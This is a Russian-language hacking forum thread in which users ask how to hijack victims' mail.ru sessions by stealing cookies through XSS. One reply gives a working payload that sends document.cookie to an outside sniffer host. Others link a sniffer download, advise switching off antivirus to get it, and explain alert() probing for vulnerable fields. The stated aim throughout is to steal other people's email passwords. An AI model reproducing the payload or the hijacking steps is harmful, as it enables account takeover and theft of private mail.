Цитата:

Сообщение от HEX xaKer

люди вопрос может и туповатым показаться но вопрос есть вопрос,
как правильно подставить куки? я на mail.ru када был во входящих менял свои куки на куки жертвы и жертва в этот момент на сайте но почему то после обнавления страницы я в ящик жертвы не перешел КУКИ я менял ПОЛНОСТЬЮ! И ровненько, может кто нибудь скажет как правильно куки подставлять??? ответьте плих в ЛС оч прошу!!!

Советую посмотреть видео - http://depositfiles.com/ru/files/1p6w2m91m (Видео от "SOKOL) там все по сифферу,+ ответ и наглядный показ на твой ответ.

Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.

Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.

И на счёт userhost не понял, какой-нибудь дайте для примера.

Цитата:


Я скачал ваш сниффер, но там все архивы битые у меня, перезалейте, пожалуйста.



Все архивы в полном ажуре, не знаю у кого что битое. Говорят, некоторые авири уже на сам линк ругаются, отключаем, качаем, снова включаем если очень страшно xD

Цитата:


Потом в коде для активной Xss недописано куда куки запишутся, допищите, пожалуйста.



Цитата:


img = new Image(); img.src = "http://unet.phpnet.us/s/s.gif?"+document.cookie;



Всё наместе, даже выделил. Опять не знаю у кого что недописано.
Кстати, откудаж такие сведения, если архивы битые?

Цитата:


И на счёт userhost не понял, какой-нибудь дайте для примера.



Когда зальёшь сниффер на свой хостинг - вот URL-адрес твоего хоста тебе примером и будет))

можете разжевать?
Ужасна распрастраннёная узявимость типа

alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.
не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)

Цитата:

Сообщение от Shady3000rf

можете разжевать?
Ужасна распрастраннёная узявимость типа

alert() Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.
не очень понял какое сообщение, сообщение должно вывестись которое я написал? т.е. alert() ? и если у меня ток выводится в сообщении alert(), что это значит)

НЕЕЕ, сообщение такого типа:IMAGE http://hacker-school.ucoz.ru/img/xss/1.png

ПОМОГ +

ага) эм а что там в этом сообщение должно быть написано? что типо этого нельзя написать или что?:realangel:

Shady3000rf, ничего не должно быть. Появление рамки сообщения (alert) свидетельствует о том, что код alert(); выполнился и есть XSS-уязвимость. (возможно внедрение другого произвольного кода)

други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS? или с любуго, который юзер посетил заранее? тоесть по сути, мне надо пароль с почты украсть допустим маил ру, мне надо именно пасивку или активку юзать маила ру, или любого другова сайта и если юзер раньше зашел на маил и потом прошел на сторонний мой сайт с XSS с смоим снифером я получу куки с маила ,или нет?

Цитата:

Сообщение от SPA-MAS

други ну не пинайте, скажите куки приходят именно с того сайта ,где выполнен XSS?

Да, и никак иначе